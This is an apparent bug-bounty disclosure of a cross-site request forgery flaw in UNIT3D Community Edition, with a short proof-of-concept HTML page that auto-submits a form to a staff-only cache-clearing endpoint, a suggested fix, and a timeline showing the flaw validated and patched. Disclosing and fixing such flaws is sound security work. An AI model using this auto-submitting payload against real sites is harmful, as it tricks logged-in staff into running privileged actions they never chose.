Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition

Valid

Reported on

Sep 24th 2021


Description

Attacker is able to run staff commands.

Proof of Concept

When you logged in open this POC.html in a browser. You can run staff only tools.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://unit3d.site/dashboard/commands/clear-cache">
    <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>

Impact

This vulnerability is capable of forging user to unintentional run staff only tools.

Test

Tested on Safari.

Fix

You should set a CSRF token on such GET requests or you can use POST instead of GET then because of cookie SameSite is Lax, request from other origins could not carry cookie.

We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back a year ago
HDVinnie validated this vulnerability a year ago
HDVinnie has been awarded the disclosure bounty
The fix bounty is now up for grabs
HDVinnie confirmed that a fix has been merged on bde1c7 a year ago
HDVinnie has been awarded the fix bounty
web.php#L736-L745 has been validated
index.blade.php#L34-L160 has been validated
to join this conversation